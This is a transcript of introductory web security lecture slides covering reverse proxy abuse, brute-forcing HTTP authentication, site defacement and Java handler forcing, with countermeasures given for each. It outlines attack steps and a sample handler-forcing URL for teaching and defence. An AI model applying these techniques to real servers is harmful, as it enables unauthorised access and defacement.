Web Security Notes
Download
Report
Transcript Web Security Notes
Web Security Notes: Scratching the
Surface of Web Vulnerabilities and
Countermeasures
1
Outline
•
•
•
•
•
•
Cyber Graffiti
Java: Remote Command Execution
E-Shopping
Database Access
Impersonation
Buffer Overflows: On-the-fly
2
Part 1: Cyber Graffiti
3
• Mapping the Target Network: Reading headers of
Emails, IP trace, port scan, etc.
• Check accessibility of different server IPs from the
Web.
• Sending raw HTTP requests from programs such as
Netcat or WebClient!!
• An example: We have a Web server running on 80
and a proxy server running on 8001.
• The proxy server accepts inside address requests
from local Intranet and the loop back address
(127.0.0.1) and send proxy request out.
• An attack called Reverse Proxy Server attempts to do
the reverse by sending and HTTP proxy request to the
proxy server and hoping the request will be forwarded
in.
4
• If this trick succeeds, you might get an authorization
prompt reply.
• In such cases, Brute forcing HTTP Authentication can
be used, example Brutus and WebCracker.
• Running a script sending various combination of
passwords with user name admin!!!!
• If you did it, you just log in!
• One of the fatal mistakes after you reach this stage is
that you get directory listing. Simple, you will know
every thing about that site.
• You can try to find a way to post your documents
there!
• Using FTP bugs, looking for Web accessible scripts
that upload files, etc. to upload the defacing document
into the staging area
5
• This staging area will be pushed to the ISP Web
server and thus you have them by now!
• Countermeasures:
– Turning off Reverse Proxy: This Web server dependent but
in case of Apache you need to use the Listen directives to
bind the proxy port to only the Internal network interface
– Using Stronger HTTP Authentication Passwords: Use hard
to crack passwords that is long, include symbols, digital,
etc. Properly design web servers should detect multiple
trial to crack the authentication protocol but most do NOT.
So, it is the admin responsibilities to always check the logs
– Turning off Directory Browsing: In Apache use the Directory
tag in the httpd.conf file, in IIS uncheck directory browsing
check box in the configuration interface
6
Part 2: Java: Remote Command
Execution
7
• The problem is that, in a JAVA based Web server there
are a number of file types to be process:
–
–
–
–
HTML: Handled by using FileServlet
JSP: Handled by using JSPServlet
Servlet: Handled using The servlet engine
SSI: SSI handler
• An attack called Handler forcing simply tries to invoke
a handler to handle a different type other than the one
it is originally design to handle.
• The vulnerability has been exploited in many systems
including WebLogic, WebSphere, Sun Java server.
• It can be used to disclose source code, run remote
command!!!!
8
• One Example: putting a java code in the feedback file
which is an HTML file, then invoke that file using the
JSP handler!!!!
• Sample URL:
– www.acmetradeonline/*.shtml/feebback/feedback.jsp
• The configuration file in the server associate all jsp
request to be handled be the JSPServlet. Here is the
problem!!!!
• Countermeasures: Hardening java server
– Sanitize input: (Do not accept any Feedback!!).
– Remove installation sample files: General recommendation, a
number exploits can success because they are there.
– Restrict Executables: cmd.exe, ftp.exe, etc. from your
production version or restrict access to them.
9